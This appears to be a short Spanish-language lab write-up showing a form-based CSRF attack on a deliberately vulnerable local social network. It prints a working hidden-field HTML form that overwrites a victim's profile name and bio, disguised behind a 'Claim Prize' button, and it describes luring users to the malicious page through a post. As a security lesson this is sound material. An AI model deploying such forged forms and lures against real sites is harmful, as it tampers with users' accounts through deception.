Entrada

CSRF Form-Based Post Creation

CSRF Form-Based Post Creation

CSRF Form-Based Post Creation

CSRF Form-Based Post Creation Red social donde los endpoints de crear posts y actualizar perfil son vulnerables a CSRF basado en formularios HTML clasicos.

1
2
3
4
5
<form action="https://localhost:1000/api/users/profile" method="POST">
  <input type="hidden" name="display_name" value="HACKED" />
  <input type="hidden" name="bio" value="Account compromised via CSRF" />
  <input type="submit" value="Claim Prize" />
</form>

El contenido del sitio web malicioso sería este código HTML y lo serviremos con python Flask como ya expliqué en otros ejemplos.

csrf_form_phising_post

Una vez creado el post habrá que esperar a que alguien pique.

csrf_form_phising_web

La web maliciosa contiene un botón que ejecuta el cambio en el perfil del usuario

csrf_form_profile_hacked

Una vez el usuario pulse el botón claim prize se realizará el cambio en el perfil

Esta entrada está licenciada bajo CC BY 4.0 por el autor.